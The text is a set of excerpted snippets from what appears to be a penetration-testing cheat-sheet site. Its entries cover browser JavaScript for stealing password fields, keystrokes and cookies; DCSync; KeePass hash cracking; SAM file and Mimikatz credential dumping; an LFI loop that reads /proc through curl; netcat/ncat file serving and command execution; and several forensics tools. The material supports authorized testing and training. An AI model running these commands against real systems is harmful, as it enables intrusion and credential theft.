-
Get hidden content from password fields Scenario: Use JavaScript for extraction. Copy and paste the following into the web browser’s console: Extract keystrokes live from a Browser Scenario: Do: Extract Cookies Scenario: Inject/Do: Extract local / session storage Like above: Stealing site passwords Scenario: Then, inject JS which adds an invisible user/username/name text field and…
-
Attacking Domain Controller Synchronization The DRS (Directory Replication Service) is responsible for replicating a DC’s data to multiple redundant DCs. Scenario: You own a user who has one of the following rights: Normally, users in the following groups have these (could be configured otherwise, of course): You can check with the script in Basic Active Directory…
-
The hash of the master password of a KeePass kdbx file can be extracted with keepass2john Database.kdbx > keepass.hash Then, crack it: /opt/hashcat/hashcat keepass.hash /opt/password_lists/rockyou.txt -m 13400 -r /opt/hashcat/rules/rockyou-30000.rule (!) If there is an error regarding the salt, check whether the hash file starts with a username prefix like “user:”. Remove it.
-
Execution If you cannot execute an exe file, try these options: Windows firewall / netsh Check firewall state netsh advfirewall show currentprofile netsh advfirewall show state If the firewall is active, list the configuration: netsh advfirewall show config Example of how to add exceptions to the firewall from an administrator command line: C:\Windows\temp> netsh advfirewall firewall…
-
Grab the SAM and system file: %windir%\repair\sam %windir%\System32\config\RegBack\SAM %windir%\system32\config\SAM %windir%\repair\system %windir%\System32\config\RegBack\system %windir%\system32\config\system (Re-) Run the credential retrievers from the script page.
-
This site contains links to tools / techniques which can run in the background during an engagement. Linux Windows
-
For reverse engineering Devicename Content /proc/$pid/maps Shows the memory mapping of a process. Includes all used libraries. /proc/self/loginuid Own UID. Read processes If you can read /proc via an LFI: #!/bin/bash for i in {1..1024} do echo $i curl http://10.10.11.154/index.php\?page=/proc/$i/cmdline --output /tmp/proc/$i done Then, look in the /tmp/proc directory for files larger than 0 bytes. Read environment of…
-
The DPAPI is a Windows system which stores passwords bound to the local system. The keys are stored in the user’s AppData\Roaming\Microsoft\Protect\<SID> directory. From the user’s password, a master key is derived. When the user changes their password, a new master key is generated as well — and all old master…
-
Windows creates and stores credentials in the Local Security Authority Subsystem Service (LSASS) in memory. On the filesystem, the SAM database stores the hashes. Use Mimikatz Usage Enable debug mode. This uses the SeDebugPrivilege so that we are able to communicate with other processes. privilege::debug Try to elevate privileges to obtain SYSTEM user privileges:…
-
BloodHound analyzes and presents Active Directory data. SharpHound is the data collector which runs on a compromised AD system. On the target: On the own system:
-
Mainly post exploitation for AD environments. (Download — also included in Kali sources) Quick usage for privilege escalation General usage Metasploit syntax / PSE syntax Note: After usemodule don’t forget to go “back” and to “interact” with the agent to see job results! Commands with an asterisk require a high-integrity Empire Agent. To upgrade one…
-
General After being root, do the following to gain additional information. Copy / break /etc/shadow or SAM Investigate all /home directories and /root ls -lahR /home/ Are there SSH keys? Investigate all databases and get / break their users and passwords Check cron jobs / crontabs Enumerate programs and determine where credentials could be. Enumerate the user’s mail Enumerate WWW directories…
-
tcpdump Get incoming ICMP packets: sudo tcpdump -i any icmp and src host $target Useful parameters Do not resolve domain names, show IPs: -n Show a dump of the data: -X Show the packet in ASCII: -A Working with files Write the dump to a file: tcpdump -w file Read the dump from a file: tcpdump -r file Standard queries tcpdump -n src|dst 10.10.10.10 and port…
-
See a packet in its context Context menu, select Follow Show only ICMP packets from a host tcpdump host 10.11.1.128 and icmp -i tun0 Show other systems communicating outside the own address range ip.addr == 10.11.1.0/24 && !(ip.addr == 192.168.119.0/24) && ! dns && !browser && !ssdp && !nbns && !llmnr Record audio Wireshark can transform captured audio…
-
Name confusion Serve a file: echo -e "HTTP/1.1 200 OK\nContent-Length: 5\n\nHallo" | nc -l localhost 8000 Request a file over SSL: echo -e "GET / HTTP/1.1\nHost: localhost\n\n" | ncat -C --ssl localhost 443 Return a program’s output: ncat -l localhost 3000 --exec /bin/date Transfer a file directly (unencrypted!): 1. Receiver: user@host02:~$ ncat -l > aha or nc -nlvp 4444…
-
Like OSXcollector, but for Windows. Collects information on a host for later analysis. https://www.fireeye.com/services/freeware/redline.html
-
osxcollector http://yelp.github.io/osxcollector/ Stand-alone Python script. Execute it on a Mac that should be analyzed. It creates an archive with “everything” interesting which the victim can hand over to an expert. See Redline for Windows